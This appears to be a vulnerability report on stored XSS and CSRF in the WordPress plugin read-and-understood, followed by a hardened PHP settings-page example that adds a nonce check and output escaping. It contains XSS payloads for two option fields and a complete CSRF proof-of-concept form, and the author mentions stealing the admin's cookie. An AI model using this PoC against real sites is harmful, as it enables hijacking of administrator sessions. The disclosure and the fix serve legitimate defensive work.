Well, sir, I just found some stored XSS bugs and a CSRF bug in the WordPress plugin read-and-understood.
When the admin user clicks the "Save changes" button on the read-and-understood settings page, the browser POSTs some data to:
http://127.0.0.1/wordpress/wp-admin/options-general.php?page=read-and-understood-menu-slug-01
But when I pentested the parameters of this plugin, I found that when I write something into this point, it is not filtered well.
Weak data parameters:
1. rnu_username_validation_title=at+least+one+but+no+more+than+10+capital+letters'"><svg/onload=console.log(/xss/)><'"
2. rnu_username_validation_pattern=%5BA-Z%5D%7B1%2C10%7D'"><svg/onload=console.log(/xss2/)><'"
Well, the stored XSS bugs here need to be combined with a CSRF bug. Because there is no CSRF protection here, we can trick the admin user into visiting the evil HTML on the evil site.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=read-and-understood-menu-slug-01" method="POST">
<!-- the embedded double quotes are entity-encoded so the attribute value stays intact when the form is submitted -->
<input type="hidden" name="rnu_username_validation_pattern" value="[A-Z]{1,10}'&quot;><svg/onload=console.log(/xss2/)><'&quot;" />
<input type="hidden" name="rnu_username_validation_title" value="at least one but no more than 10 capital letters'&quot;><svg/onload=console.log(/xss/)><'&quot;" />
<input type="hidden" name="rnu_username" value="" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="hidden" name="submit_hidden" value="Y" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In a word, if the manager could be tricked into visiting my evil HTML on my site, I could get the manager's cookie easily, or do something more evil.
Well, by the way, I only tested the bug on WordPress 4.9.1 and the latest version of the wp-plugin read-and-understood.
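The fix on the plugin side is the usual trio of an authorisation check, a nonce check against CSRF, and escaping on output. Below is an added example of a hardened settings page for the two options named in the report; it is not the plugin's own code, and the function names and the 'rnu_example_*' nonce action are assumptions, while the WordPress API calls are real.

```php
<?php
// Added example (not read-and-understood's code): hardened admin settings page
// for the two option names from the report. Names prefixed rnu_example_ are assumed.

function rnu_example_settings_page() {
    // 1. Authorisation: only users allowed to manage options may reach this page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You do not have permission to change these settings.' );
    }

    if ( isset( $_POST['submit_hidden'] ) && 'Y' === $_POST['submit_hidden'] ) {
        // 2. CSRF: check_admin_referer() dies unless a valid nonce for this action
        //    was posted, so a form auto-submitted from another origin cannot save.
        check_admin_referer( 'rnu_example_save', 'rnu_example_nonce' );

        // 3. Input sanitisation: strip tags/control characters before storing.
        //    (sanitize_text_field() removes anything that looks like a tag; if a
        //    regex pattern legitimately needs '<', store it raw and rely on step 4.)
        $title   = sanitize_text_field( wp_unslash( $_POST['rnu_username_validation_title'] ?? '' ) );
        $pattern = sanitize_text_field( wp_unslash( $_POST['rnu_username_validation_pattern'] ?? '' ) );
        update_option( 'rnu_username_validation_title', $title );
        update_option( 'rnu_username_validation_pattern', $pattern );
    }

    $title   = get_option( 'rnu_username_validation_title', '' );
    $pattern = get_option( 'rnu_username_validation_pattern', '' );
    ?>
    <div class="wrap">
      <form method="post" action="">
        <?php wp_nonce_field( 'rnu_example_save', 'rnu_example_nonce' ); ?>
        <!-- 4. Output escaping: esc_attr() encodes quotes and angle brackets, so a
             stored '"><svg ...> sequence stays inside the attribute value. -->
        <input type="text" name="rnu_username_validation_title"
               value="<?php echo esc_attr( $title ); ?>" />
        <input type="text" name="rnu_username_validation_pattern"
               value="<?php echo esc_attr( $pattern ); ?>" />
        <input type="hidden" name="submit_hidden" value="Y" />
        <?php submit_button( 'Save Changes' ); ?>
      </form>
    </div>
    <?php
}
```

With the nonce in place, the PoC form above is rejected by check_admin_referer() before any option is written, and even a value that was stored earlier is rendered harmless by esc_attr() when the page is displayed.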
